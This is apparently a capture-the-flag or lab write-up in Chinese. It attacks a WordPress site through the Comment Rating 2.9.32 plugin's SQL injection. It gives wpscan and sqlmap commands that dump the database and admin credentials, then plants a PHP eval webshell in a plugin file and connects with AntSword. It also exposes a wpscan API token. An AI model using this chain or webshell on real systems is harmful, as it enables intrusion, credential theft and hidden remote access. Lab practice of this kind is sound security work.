题目详细
    题目.PNG
    打开环境用 Wappalyzer 检测到 CMS WorkPress
    cms.PNG
    在 kali 上用 wpscan 扫描一下发现有 Comment Rating 2.9.32 插件和 SQL注入漏洞

    payload:wpscan --api-token 5zsGjUMaWmsN4Saha8mrz8vp1PmVRBUIMwJhlw93cgU --url [http://124.70.71.251:44334/](http://124.70.71.251:44334/)
    wp扫描出漏洞.PNG
    打开 [https://www.exploit-db.com/exploits/24552/](https://www.exploit-db.com/exploits/24552/) 查看漏洞利用的信息发现有可利用的信息

    可利用信息: GET /wordpress/wp-content/plugins/comment-rating/ck-processkarma.php?id=2&action=add&path=a&imgIndex=1_14_ HTTP/1.1
    插件内容.PNG
    构造 payload 利用 sqlmap 获取数据库信息以及账号密码

    利用语句sqlmap -u "[http://124.70.71.251:44334/wp-content/plugins/comment-rating/ck-processkarma.php?id=2&action=add&path=a"](http://124.70.71.251:44334/wp-content/plugins/comment-rating/ck-processkarma.php?id=2&action=add&path=a") -batch -dbs 获取数据库版本和数据库名
    数据库.PNG

    利用语句 sqlmap -u "[http://124.70.71.251:44334/wp-content/plugins/comment-rating/ck-processkarma.php?id=2&action=add&path=a"](http://124.70.71.251:44334/wp-content/plugins/comment-rating/ck-processkarma.php?id=2&action=add&path=a") -batch -D test -tables 获取数据库表
    表.PNG

    利用语句 sqlmap -u "[http://124.70.71.251:44334/wp-content/plugins/comment-rating/ck-processkarma.php?id=2&action=add&path=a"](http://124.70.71.251:44334/wp-content/plugins/comment-rating/ck-processkarma.php?id=2&action=add&path=a") -batch -D test -T wp_users --dump 爆字段值
    字段值.PNG

    得到 用户名:admin 密码: 12qwaszx 进行登录
    登录.PNG

    登录进去找到插件,寻找到 Comment Rating 2.9.32 的插件
    插件.PNG

    在插件文本上添加一句话木马 <?php @eval($_POST['shell']);?>
    添加一句话木马.PNG

    利用中国蚁剑进行连接,查看目录文件找到key
    编辑蚁剑.PNGkey.PNG